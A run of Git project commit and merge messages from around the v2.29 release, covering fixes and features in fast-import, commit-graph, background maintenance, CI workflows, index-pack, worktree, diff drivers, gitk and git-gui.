- Fix wrong script in completion configuration. zsh wants bash completion
path here, not path to itself.
- Add `compinit` autoload command, since whole thing didn't work
if it is not loaded.
Signed-off-by: Alexey <lesha.ogonkov@gmail.com>
Reviewed-by: Stefan Haller <lists@haller-berlin.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 1bdca81641 (fast-import: add options for rewriting submodules,
2020-02-22) accidentally added two lines parsing the option
"rewrite-submodules-from". This didn't do anything in practice, because
they're in an if/else chain and so the second one can never trigger.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The template is a more-or-less exact translation to shell of the C
code for the default behaviour for git's push-to-checkout hook defined
in the push_to_deploy() function in builtin/receive-pack.c, to serve
as a convenient starting point for modification.
It also contains relevant text extracted from the git-config(1) and
githooks(5) man pages.
Signed-off-by: Adam Spiers <git@adamspiers.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's an easy mistake to define a variable in a header with "int x;" when
you really meant to only declare the variable as "extern int x;"
instead. Clang and gcc will both allow this when building with
"-fcommon"; they put these "tentative definitions" in a common block
which the linker is able to resolve.
This is the default in clang and was the default in gcc until gcc-10,
since it helps some legacy code. However, we would prefer not to rely on
this because:
- using "extern" makes the intent more clear (so it's a style issue,
but it's one the compiler can help us catch)
- according to the gcc manpage, it may yield a speed and code size
penalty
So let's build explicitly with -fno-common when the DEVELOPER knob is
set, which will let developers using clang and older versions of gcc
notice these problems.
I didn't bother making this conditional on a particular version of gcc.
As far as I know, this option has been available forever in both gcc and
clang, so old versions don't need to avoid it. And we already expect gcc
and clang options throughout config.mak.dev, so it's unlikely anybody
setting the DEVELOPER knob is using anything else. It's a noop on
gcc-10, of course, but it's not worth trying to exclude it there.
Note that there's nothing to fix in the code; we already don't have any
issues here. But if you want to test the patch, you can add a bare "int
x;" into cache.h, which will cause the link step to fail.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'git maintenance run' subcommand takes a lock on the object database
to prevent concurrent processes from competing for resources. This is an
important safety measure to prevent possible repository corruption and
data loss.
This feature can lead to confusing behavior if a user is not aware of
it. Add a TROUBLESHOOTING section to the 'git maintenance' builtin
documentation that discusses these tradeoffs. The short version of this
section is that Git will not corrupt your repository, but if the list of
scheduled tasks takes longer than an hour then some scheduled tasks may
be dropped due to this object database collision. For example, a
long-running "daily" task at midnight might prevent an "hourly" task
from running at 1AM.
The opposite is also possible, but less likely as long as the "hourly"
tasks are much faster than the "daily" and "weekly" tasks.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'git maintenance (register|start)' subcommands add the current
repository to the global Git config so maintenance will operate on that
repository. It does not specify what maintenance should occur or how
often.
To make it simple for users to start background maintenance with a
recommended schedlue, update the 'maintenance.strategy' config option in
both the 'register' and 'start' subcommands. This allows users to
customize beyond the defaults using individual
'maintenance.<task>.schedule' options, but also the user can opt-out of
this strategy using 'maintenance.strategy=none'.
Helped-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To provide an on-ramp for users to use background maintenance without
several 'git config' commands, create a 'maintenance.strategy' config
option. Currently, the only important value is 'incremental' which
assigns the following schedule:
* gc: never
* prefetch: hourly
* commit-graph: hourly
* loose-objects: daily
* incremental-repack: daily
These tasks are chosen to minimize disruptions to foreground Git
commands and use few compute resources.
The 'maintenance.strategy' is intended as a baseline that can be
customzied further by manually assigning 'maintenance.<task>.enabled'
and 'maintenance.<task>.schedule' config options, which will override
any recommendation from 'maintenance.strategy'. This operates similarly
to config options like 'feature.experimental' which operate as "meta"
config options that change default config values.
This presents a way forward for updating the 'incremental' strategy in
the future or adding new strategies. For example, a potential strategy
could be to include a 'full' strategy that runs the 'gc' task weekly
and no other tasks by default.
Helped-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The usage, die, warning, and error routines all work with a function
pointer that takes the message to be reported. We usually just mention
the function's full type inline. But this makes the use of these
pointers hard to read, especially because C's syntax for returning a
function pointer is so awful:
void (*get_error_routine(void))(const char *err, va_list params);
Unless you read it very carefully, this looks like a function pointer
declaration. Let's instead use a single typedef to define a reporting
function, which is the same for all four types.
Note that this also removes the "extern" from these declarations to
match the surrounding functions. They were missed in 554544276a (*.[ch]:
remove extern from function declarations using spatch, 2019-04-29)
presumably because of the unusual syntax.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fast-import stores its marks in a trie-like structure made of mark_set
structs. Each struct has a fixed size (1024). If our id number is too
large to fit in the struct, then we allocate a new struct which shifts
the id number by 10 bits. Our original struct becomes a child node
of this new layer, and the new struct becomes the top level of the trie.
This scheme was broken by ddddf8d7e2 (fast-import: permit reading
multiple marks files, 2020-02-22). Before then, we had a top-level
"marks" pointer, and the push-down worked by assigning the new top-level
struct to "marks". But after that commit, insert_mark() takes a pointer
to the mark_set, rather than using the global "marks". It continued to
assign to the global "marks" variable during the push down, which was
wrong for two reasons:
- we added a call in option_rewrite_submodules() which uses a separate
mark set; pushing down on "marks" is outright wrong here. We'd
corrupt the "marks" set, and we'd fail to correctly store any
submodule mappings with an id over 1024.
- the other callers passed "marks", but the push-down was still wrong.
In read_mark_file(), we take the pointer to the mark_set as a
parameter. So even though insert_mark() was updating the global
"marks", the local pointer we had in read_mark_file() was not
updated. As a result, we'd add a new level when needed, but then the
next call to insert_mark() wouldn't see it! It would then allocate a
new layer, which would also not be seen, and so on. Lookups for the
lost layers obviously wouldn't work, but before we even hit any
lookup stage, we'd generally run out of memory and die.
Our tests didn't notice either of these cases because they didn't have
enough marks to trigger the push-down behavior. The new tests in t9304
cover both cases (and fail without this patch).
We can solve the problem by having insert_mark() take a pointer-to-pointer
of the top-level of the set. Then our push down can assign to it in a
way that the caller actually sees. Note the subtle reordering in
option_rewrite_submodules(). Our call to read_mark_file() may modify our
top-level set pointer, so we have to wait until after it returns to
assign its value into the string_list.
Reported-by: Sergey Brester <serg.brester@sebres.de>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The existence of hashmap_free() and hashmap_free_entries() confused me,
and the docs weren't clear enough. We are dealing with a map table,
entries in that table, and possibly also things each of those entries
point to. I had to consult other source code examples and the
implementation. Add a brief note to clarify the differences. This will
become even more important once we introduce a new
hashmap_partial_clear() function which will add the question of whether
the table itself has been freed.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 7d78d5fc1a (ci: skip GitHub workflow runs for already-tested
commits/trees, 2020-10-08), we added a check that determines whether
there is already a workflow run for the given commit (or at least tree),
and if found, skips the current run.
We just worked around an issue with this check where older runs might
unexpectedly miss the `head_commit` attribute.
Let's be even more defensive by catching all kinds of exceptions,
logging them as warnings, and continue the run without skipping it
(after all, if the check fails, we _want_ to continue with the run).
This commit is best viewed with the diff option `-w` because it
increases the indentation level of the GitHub Action script by two
spaces, surrounding it by a `try ... catch` construct.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Apparently older GitHub runs at least _sometimes_ lack information about
the `head_commit` (and therefore the `ci-config` check will fail with
"TypeError: Cannot read property 'tree_id' of null") in the check added
in 7d78d5fc1a (ci: skip GitHub workflow runs for already-tested
commits/trees, 2020-10-08).
Let's work around this by adding a defensive condition.
Reported-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
deref_tag() can return NULL. Exit gracefully in that case instead
of blindly dereferencing the return value.
.name shouldn't ever be NULL, but grep_object() handles that case
explicitly, so let's be defensive here as well and show the broken
object's ID if it happens to lack a name after all.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "git worktree list" shows the absolute path to the working tree,
the commit that is checked out and the name of the branch. It is not
immediately obvious which of the worktrees, if any, are locked.
"git worktree remove" refuses to remove a locked worktree with
an error message. If "git worktree list" told which worktrees
are locked in its output, the user would not even attempt to
remove such a worktree, or would realize that
"git worktree remove -f -f <path>" is required.
Teach "git worktree list" to append "locked" to its output.
The output from the command becomes like so:
$ git worktree list
/path/to/main abc123 [master]
/path/to/worktree 456def (detached HEAD)
/path/to/locked-worktree 123abc (detached HEAD) locked
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reduce the dependency on external tools by generating the distribution
archives for HTML documentation and manpages using git commands instead
of tar. This gives the archive entries the same meta data as those in
the dist archive for binaries.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Recently, a user had an issue due to combining
fetch.writeCommitGraph=true with core.commitGraph=false. The root bug
has been resolved by preventing commit-graph writes when
core.commitGraph is disabled. This happens inside the 'git commit-graph
write' command, but we can be more aware of this situation and prevent
that process from ever starting in the 'commit-graph' maintenance task.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
I am excited. Because I like a lot languages, and because I believe this
is the way to contribute to a large number of Portuguese speaking
person.
Jiang Xin and last Portuguese team gave me the lead. Thank you very
much. Honored to be a part of such a project.
Signed-off-by: Daniel Santos <hello@brighterdan.com>
Git 2.29-rc1
* tag 'v2.29.0-rc1' of github.com:git/git:
Git 2.29-rc1
doc: fix the bnf like style of some commands
doc: git-remote fix ups
doc: use linkgit macro where needed.
git-bisect-lk2009: make continuation of list indented
ci: do not skip tagged revisions in GitHub workflows
ci: skip GitHub workflow runs for already-tested commits/trees
tests: avoid using the branch name `main`
t1415: avoid using `main` as ref name
Makefile: ASCII-sort += lists
help: do not expect built-in commands to be hardlinked
index-pack: make get_base_data() comment clearer
index-pack: drop type_cas mutex
index-pack: restore "resolving deltas" progress meter
compat/mingw.h: drop extern from function declaration
GitHub workflow: automatically follow minor updates of setup-msbuild
t5534: split stdout and stderr redirection
The core.commitGraph config setting can be set to 'false' to prevent
parsing commits from the commit-graph file(s). This causes an issue when
trying to write with "--split" which needs to distinguish between
commits that are in the existing commit-graph layers and commits that
are not. The existing mechanism uses parse_commit() and follows by
checking if there is a 'graph_pos' that shows the commit was parsed from
the commit-graph file.
When core.commitGraph=false, we do not parse the commits from the
commit-graph and 'graph_pos' indicates that no commits are in the
existing file. The --split logic moves forward creating a new layer on
top that holds all reachable commits, then possibly merges down into
those layers, resulting in duplicate commits. The previous change makes
that merging process more robust to such a situation in case it happens
in the written commit-graph data.
The easy answer here is to avoid writing a commit-graph if reading the
commit-graph is disabled. Since the resulting commit-graph will would not
be read by subsequent Git processes. This is more natural than forcing
core.commitGraph to be true for the 'write' process.
Reported-by: Thomas Braun <thomas.braun@virtuell-zuhause.de>
Helped-by: Jeff King <peff@peff.net>
Helped-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Thomas reported [1] that a "git fetch" command was failing with an error
saying "unexpected duplicate commit id". The root cause is that they had
fetch.writeCommitGraph enabled which generates commit-graph chains, and
this instance was merging two layers that both contained the same commit
ID.
[1] https://lore.kernel.org/git/55f8f00c-a61c-67d4-889e-a9501c596c39@virtuell-zuhause.de/
The initial assumption is that Git would not write a commit ID into a
commit-graph layer if it already exists in a lower commit-graph layer.
Somehow, this specific case did get into that situation, leading to this
error.
While unexpected, this isn't actually invalid (as long as the two layers
agree on the metadata for the commit). When we parse a commit that does
not have a graph_pos in the commit_graph_data_slab, we use binary search
in the commit-graph layers to find the commit and set graph_pos. That
position is never used again in this case. However, when we parse a
commit from the commit-graph file, we load its parents from the
commit-graph and assign graph_pos at that point. If those parents were
already parsed from the commit-graph, then nothing needs to be done.
Otherwise, this graph_pos is a valid position in the commit-graph so we
can parse the parents, when necessary.
Thus, this die() is too aggressive. The easiest thing to do would be to
ignore the duplicates.
If we only ignore the duplicates, then we will produce a commit-graph
that has identical commit IDs listed in adjacent positions. This excess
data will never be removed from the commit-graph, which could cascade
into significantly bloated file sizes.
Thankfully, we can collapse the list to erase the duplicate commit
pointers. This allows us to get the end result we want without extra
memory costs and minimal CPU time.
The root cause is due to disabling core.commitGraph, which prevents
parsing commits from the lower layers during a 'git commit-graph write
--split' command. Since we use the 'graph_pos' value to determine
whether a commit is in a lower layer, we never discover that those
commits are already in the commit-graph chain and add them to the top
layer. This layer is then merged down, creating duplicates.
The test added in t5324-split-commit-graph.sh fails without this change.
However, we still have not completely removed the need for this
duplicate check. That will come in a follow-up change.
Reported-by: Thomas Braun <thomas.braun@virtuell-zuhause.de>
Helped-by: Taylor Blau <me@ttaylorr.com>
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Not all developers are aware of `git diff --check` to warn
about whitespace issues. Running a check when a pull request is
opened or updated can save time for reviewers and the submitter.
A GitHub workflow will run when a pull request is created or the
contents are updated to check the patch series. A pull request
provides the necessary information (number of commits) to only
check the patch series.
To ensure the developer is aware of any issues, a comment will be
added to the pull request with the check errors.
Signed-off-by: Chris. Webster <chris@webstech.net>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Test preparation for the switch of default branch name continues.
* js/default-branch-name-part-3:
tests: avoid using the branch name `main`
t1415: avoid using `main` as ref name
The logic to skip testing on the tagged commit and the tag itself
was not quite consistent which led to failure of Windows test
tasks. It has been revamped to consistently skip revisions that
have already been tested, based on the tree object of the revision.
* js/ci-ghwf-dedup-tests:
ci: do not skip tagged revisions in GitHub workflows
ci: skip GitHub workflow runs for already-tested commits/trees
Doc fixes.
* ja/misc-doc-fixes:
doc: fix the bnf like style of some commands
doc: git-remote fix ups
doc: use linkgit macro where needed.
git-bisect-lk2009: make continuation of list indented
Hotfix and clean-up for the jt/threaded-index-pack topic that has
graduated to v2.29-rc0.
* jk/index-pack-hotfixes:
index-pack: make get_base_data() comment clearer
index-pack: drop type_cas mutex
index-pack: restore "resolving deltas" progress meter
In command line options, variables are entered between < and >
Signed-off-by: Jean-Noël Avila <jn.avila@free.fr>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When `master` is tagged, and then both `master` and the tag are pushed,
Travis CI will happily build both. That is a waste of energy, which is
why we skip the build for `master` in that case.
Our GitHub workflow is also triggered by tags. However, the run would
fail because the `windows-test` jobs are _not_ skipped on tags, but the
`windows-build` job _is skipped (and therefore fails to upload the
build artifacts needed by the test jobs).
In addition, we just added logic to our GitHub workflow that will skip
runs altogether if there is already a successful run for the same commit
or at least for the same tree.
Let's just change the GitHub workflow to no longer specifically skip
tagged revisions.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pushing a commit that has already passed a CI or PR build
successfully, it makes sense to save some energy and time and skip the
new build.
Let's teach our GitHub workflow to do that.
For good measure, we also compare the tree ID, which is what we actually
test (the commit ID might have changed due to a reworded commit message,
which should not affect the outcome of the run).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since Git now supports hashes other than SHA-1, the hash length isn't
guaranteed to be 40 characters. Replace $_x40 with a hash-agnostic OID
pattern.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the git-resurrect script, there are a few lines that are mistakenly
indented with spaces. Replace these lines with tabs.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the near future, we want to change Git's default branch name to
`main`. In preparation for that, stop using it as a branch name in the
test suite. Replace that branch name by `topic`, the same name we used
to rename variations of `master` in b6211b89eb (tests: avoid variations
of the `master` branch name, 2020-09-26).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for a patch series that will change the fall-back for
`init.defaultBranch` to `main`, let's not use `main` as ref name in this
test script.
Otherwise, the `git for-each-ref ... | grep main` which wants to catch
those refs would also unexpectedly catch `refs/heads/main`.
Since the refs in question are worktree-local ones (i.e. each worktree
has their own, just like `HEAD`), and since the test case already uses a
secondary worktree called "second", let's use the name "first" for those
refs instead.
While at it, adjust the test titles that talk about a "repo" when they
meant a "worktree" instead.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 805d9eaf5e (Makefile: ASCII-sort += lists, 2020-03-21), the += lists
in the Makefile were sorted into ASCII order. Since then, more out of
order elements have been introduced. Sort these lists back into ASCII
order.
This patch is best viewed with `--color-moved`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The auto condition for the commit-graph maintenance task walks refs
looking for commits that are not in the commit-graph file. This was
added in 4ddc79b2 (maintenance: add auto condition for commit-graph
task, 2020-09-17) but was left untested.
The initial goal of this change was to demonstrate the feature works
properly by adding tests. However, there was an off-by-one error that
caused the basic tests around maintenance.commit-graph.auto=1 to fail
when it should work.
The subtlety is that if a ref tip is not in the commit-graph, then we
were not adding that to the total count. In the test, we see that we
have only added one commit since our last commit-graph write, so the
auto condition would say there is nothing to do.
The fix is simple: add the check for the commit-graph position to see
that the tip is not in the commit-graph file before starting our walk.
Since this happens before adding to the DFS stack, we do not need to
clear our (currently empty) commit list.
This does add some extra complexity for the test, because we also want
to verify that the walk along the parents actually does some work. This
means we need to add at least two commits in a row without writing the
commit-graph. However, we also need to make sure no additional refs are
pointing to the middle of this list or else the for_each_ref() in
should_write_commit_graph() might visit these commits as tips instead of
doing a DFS walk. Hence, the last two commits are added with "git
commit" instead of "test_commit".
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The regex used for the CSS builtin diff driver in git is only
able to show chunk headers for lines that start with a number,
a letter or an underscore.
However, the regex fails to detect classes (starts with a .), ids
(starts with a #), :root and attribute-value based selectors (for
example [class*="col-"]), as well as @based block-level statements
like @page,@keyframes and @media since all of them, start with a
special character.
Allow the selectors and block level statements to begin with these
special characters.
Signed-off-by: Sohom Datta <sohom.datta@learner.manipal.edu>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current behavior of git checkout/switch is that --guess is currently
enabled by default. However, some users may not wish for this to happen
automatically. Instead of forcing users to specify --no-guess manually
each time, teach these commands the checkout.guess configuration
variable that gives users the option to set a default behavior.
Teach the completion script to recognize the new config variable and
disable DWIM logic if it is set to false.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Improve dark mode support. Do not hard-code widget colors and instead
pull them from the current theme and update them in the options
database.
* st/dark-mode:
git-gui: improve dark mode support
When building with SKIP_DASHED_BUILT_INS=YesPlease, the built-in
commands are no longer present in the `PATH` as hardlinks to `git`.
As a consequence, `load_command_list()` needs to be taught to find the
names of the built-in commands from elsewhere.
This only affected the output of `git --list-cmds=main`, but not the
output of `git help -a` because the latter includes the built-in
commands by virtue of them being listed in command-list.txt.
The bug was detected via a patch series that turns the merge strategies
included in Git into built-in commands: `git merge -s help` relies on
`load_command_list()` to determine the list of available merge
strategies.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A comment mentions that we may free cached delta bases via
find_unresolved_deltas(), but that function went away in f08cbf60fe
(index-pack: make quantum of work smaller, 2020-09-08). Since we need to
rewrite that comment anyway, make the entire comment clearer.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The type_cas lock lost all of its callers in f08cbf60fe (index-pack:
make quantum of work smaller, 2020-09-08), so we can safely delete it.
The compiler didn't alert us that the variable became unused, because we
still call pthread_mutex_init() and pthread_mutex_destroy() on it.
It's worth considering also whether that commit was in error to remove
the use of the lock. Why don't we need it now, if we did before, as
described in ab791dd138 (index-pack: fix race condition with duplicate
bases, 2014-08-29)? I think the answer is that we now look at and assign
the child_obj->real_type field in the main thread while holding the
work_lock(). So we don't have to worry about racing with the worker
threads.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit f08cbf60fe (index-pack: make quantum of work smaller, 2020-09-08)
refactored the main loop in threaded_second_pass(), but also deleted the
call to display_progress() at the top of the loop. This means that users
typically see no progress at all during the delta resolution phase (and
for large repositories, Git appears to hang).
This looks like an accident that was unrelated to the intended change of
that commit, since we continue to update nr_resolved_deltas in
resolve_delta(). Let's restore the call to get that progress back.
We'll also add a test that confirms we generate the expected progress.
This isn't perfect, as it wouldn't catch a bug where progress was
delayed to the end. That was probably possible to trigger when receiving
a thin pack, because we'd eventually call display_progress() from
fix_unresolved_deltas(), but only once after doing all the work.
However, since our test case generates a complete pack, it reliably
demonstrates this particular bug and its fix. And we can't do better
without making the test racy.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
At the same time also deduplicate those options from command completions
which use $__git_diff_common_options.
Signed-off-by: Robert Karszniewicz <avoidr@posteo.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 554544276a (*.[ch]: remove extern from function declarations using
spatch, 2019-04-29), `extern` on function declarations were declared to
be redundant and thus removed from the codebase. An `extern` was
accidentally reintroduced in 08809c09aa (mingw: add a helper function to
attach GDB to the current process, 2020-02-13).
Remove this spurious `extern`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is the custom to follow minor updates of GitHub Actions
automatically, by using the suffix `@v1`. Actions' maintainers will then
update that `v1` ref to point to the newest.
However, for `microsoft/setup-msbuild`, 889cacb689 (ci: configure
GitHub Actions for CI/PR, 2020-04-11) uses a very specific `@v1.0.0`
suffix.
In this instance, that is a problem: should `setup-msbuild` release a
new version that intends to fix a critical bug, we won't know it, and we
won't use it.
Such a scenario is not theoretical. It is happening right now:
https://github.blog/changelog/2020-10-01-github-actions-deprecating-set-env-and-add-path-commands
Let's simplify our setup, allowing us to benefit from automatically
using the newest v1.x.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since the builtin add-p is used when $GIT_TEST_ADD_I_USE_BUILTIN is
given, we should replace the PERL prerequisite with an ADD_I
prerequisite which first checks if $GIT_TEST_ADD_I_USE_BUILTIN is
defined before checking PERL.[0] Mark this in a NEEDSWORK so that it can
be addressed at a later time.
[0]: https://lore.kernel.org/git/xmqqsgat7ttf.fsf@gitster.c.googlers.com/
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Using "A...B" has been supported for the <tree-ish> argument for a
while. However, its support has never been explicitly documented.
Explicitly document it so that users know that it is available.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Running `git checkout -p` with a merge-base rev results in an error:
$ git checkout -p HEAD...
usage: git diff-index [-m] [--cached] [<common-diff-options>] <tree-ish> [<path>...]
common diff options:
-z output diff-raw with lines terminated with NUL.
-p output patch format.
-u synonym for -p.
--patch-with-raw
output both a patch and the diff-raw format.
--stat show diffstat instead of patch.
--numstat show numeric diffstat instead of patch.
--patch-with-stat
output a patch and prepend its diffstat.
--name-only show only names of changed files.
--name-status show names and status of changed files.
--full-index show full object name on index lines.
--abbrev=<n> abbreviate object names in diff-tree header and diff-raw.
-R swap input file pairs.
-B detect complete rewrites.
-M detect renames.
-C detect copies.
--find-copies-harder
try unchanged files as candidate for copy detection.
-l<n> limit rename attempts up to <n> paths.
-O<file> reorder diffs according to the <file>.
-S<string> find filepair whose only one side contains the string.
--pickaxe-all
show all files diff when -S is used and hit is found.
-a --text treat all files as text.
Cannot close git diff-index --cached --numstat --summary HEAD... -- () at <redacted>/libexec/git-core/git-add--interactive line 183.
This happens because checkout passes the literal argument (in the
example, `HEAD...`) to diff-index which does not recognise merge-base
revs.
Fix this by using the hex of the found commit instead of the given name.
Note that "HEAD" is handled specially in run_add_interactive() so it's
explicitly not changed.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The modern style for Git documentation is to use backticks to quote
any command-line documenation so that it is typeset in monospace.
Replace all single quotes with backticks to conform to this.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
PHP permits functions to be defined like
final public function foo() { }
abstract protected function bar() { }
but our hunk header pattern does not recognize these decorations.
Add "final" and "abstract" to the list of function modifiers.
Helped-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Javier Spagnoletti <phansys@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The colors of some ttext widgets are hard-coded. These hard-coded colors
are okay with a light theme but with a dark theme some widgets are dark
colored and the hard-coded ones are still light. This defeats the
purpose of applying the theme and makes the UI look very awkward.
Remove the hard-coded colors in ttext calls and use colors from the
theme for those widgets via Text.Background and Text.Foreground from the
option database.
Similarly, the highlighting for the currently selected file(s) in the
"Staged Files" and "Unstaged Files" sections is also hard-coded. Pull
the colors for that from the current theme to make sure it is in line
Signed-off-by: Serg Tereshchenko <serg.partizan@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
On atomic pushing failure with GnuPG, we expect a very specific output
in stdout due to `--porcelain` switch.
On such failure, we also write down some helpful hint into stderr
in order to help user understand what happens and how to continue from
those failures.
On a lot of system, those hint (in stderr) will be flushed first,
then those messages in stdout will be flushed. In such systems, the
current test code is fine as is.
However, we don't have such guarantee, (at least) there're some real
systems that writes those stream interleaved. On such systems, we may
see the stderr stream written in the middle of stdout stream.
Let's split those stream redirection. By splitting those stream,
the output stream will contain exactly what we want to compare,
thus, saving us a "sed" invocation.
While we're at it, change the `test_i18ncmp` to `test_cmp` because we
will never translate those messages (because of `--porcelain`).
Signed-off-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Loosen the parser in the receiving end of the credential protocol
to allow credential helper to terminate lines with CRLF line
ending, as well as LF line ending.
* nl/credential-crlf:
credential: treat CR/LF as line endings in the credential protocol
"git format-patch" learns to take "whenAble" as a possible value
for the format.useAutoBase configuration variable to become no-op
when the automatically computed base does not make sense.
* jk/format-auto-base-when-able:
format-patch: teach format.useAutoBase "whenAble" option
"log -c --find-object=X" did not work well to find a merge that
involves a change to an object X from only one parent.
* jk/diff-cc-oidfind-fix:
combine-diff: handle --find-object in multitree code path
"git archive" learns the "--add-file" option to include untracked
files into a snapshot from a tree-ish.
* rs/archive-add-file:
Makefile: use git-archive --add-file
archive: add --add-file
archive: read short blobs in archive.c::write_archive_entry()
The lazy fetching done internally to make missing objects available
in a partial clone incorrectly made permanent damage to the partial
clone filter in the repository, which has been corrected.
* jt/keep-partial-clone-filter-upon-lazy-fetch:
fetch: do not override partial clone filter
promisor-remote: remove unused variable
Code cleanup.
* jk/unused:
dir.c: drop unused "untracked" from treat_path_fast()
sequencer: handle ignore_footer when parsing trailers
test-advise: check argument count with argc instead of argv
sparse-checkout: fill in some options boilerplate
sequencer: drop repository argument from run_git_commit()
push: drop unused repo argument to do_push()
assert PARSE_OPT_NONEG in parse-options callbacks
env--helper: write to opt->value in parseopt helper
drop unused argc parameters
convert: drop unused crlf_action from check_global_conv_flags_eol()
Using the CMake support we added some time ago for real with Visual
Studio build revealed there were lot of usability improvements
possible, which have been carried out.
* js/cmake-vs:
hashmap_for_each_entry(): workaround MSVC's runtime check failure #3
cmake (Windows): recommend using Visual Studio's built-in CMake support
cmake (Windows): initialize vcpkg/build dependencies automatically
cmake (Windows): complain when encountering an unknown compiler
cmake (Windows): let the `.dll` files be found when running the tests
cmake: quote the path accurately when editing `test-lib.sh`
cmake: fall back to using `vcpkg`'s `msgfmt.exe` on Windows
cmake: ensure that the `vcpkg` packages are found on Windows
cmake: do find Git for Windows' shell interpreter
cmake: ignore files generated by CMake as run in Visual Studio
Code clean-up.
* ma/worktree-cleanups:
worktree: use skip_prefix to parse target
worktree: rename copy-pasted variable
worktree: update renamed variable in comment
worktree: inline `worktree_ref()` into its only caller
wt-status: introduce wt_status_state_free_buffers()
wt-status: print to s->fp, not stdout
wt-status: replace sha1 mentions with oid
Update the tests to drop word 'master' from them.
* js/default-branch-name-part-2:
t9902: avoid using the branch name `master`
tests: avoid variations of the `master` branch name
t3200: avoid variations of the `master` branch name
fast-export: avoid using unnecessary language in a code comment
t/test-terminal: avoid non-inclusive language
"gitk" update.
* pm/gitk-update:
gitk: Resize panes correctly when reducing window size
gitk: replace tabs with spaces
gitk: fix the context menu not appearing in the presence of submodule diffs
gitk: Un-hide selection in areas with non-default background color
gitk: add diff lines background colors
gitk: be prepared to be run in a bare repository
gitk: Preserve window dimensions on exit when not using ttk themes
gitk: don't highlight files after submodules as submodules
gitk: fix branch name encoding error
